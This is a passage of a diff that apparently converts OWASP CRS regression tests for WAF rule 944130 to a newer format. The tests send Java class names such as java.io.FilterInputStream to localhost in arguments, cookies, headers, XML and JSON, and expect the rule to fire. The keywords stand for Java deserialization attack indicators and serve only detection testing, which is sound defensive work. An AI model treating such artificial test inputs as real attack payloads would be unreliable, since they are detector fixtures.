"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log: + expect_ids: [944130] + - test_id: 119 desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-120 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log: + expect_ids: [944130] + - test_id: 120 desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-121 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 121 desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 122 desc: "Argument test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 123 desc: "Argument name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 124 desc: "Cookie test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 125 desc: "Cookie name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 126 desc: "Request header test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 127 desc: "XML attribute value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 128 desc: "XML element value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 129 desc: "Nested XML element value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 130 desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 131 desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 132 desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 133 desc: "Argument test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-134 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 134 desc: "Argument name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-135 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader=test" + output: + log: + expect_ids: [944130] + - test_id: 135 desc: "Cookie test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-136 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 136 desc: "Cookie name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-137 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 137 desc: "Request header test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-138 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 138 desc: "XML attribute value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-139 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 139 desc: "XML element value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-140 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 140 desc: "Nested XML element value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-141 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 141 desc: "Content-Type text/plain includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-142 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 142 desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-143 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 143 desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-144 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 144 desc: "Argument test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-145 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 145 desc: "Argument name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-146 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 146 desc: "Cookie test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-147 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 